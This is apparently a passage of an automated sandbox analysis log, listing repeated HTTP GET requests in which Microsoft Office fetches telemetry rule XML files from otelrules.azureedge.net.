          Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
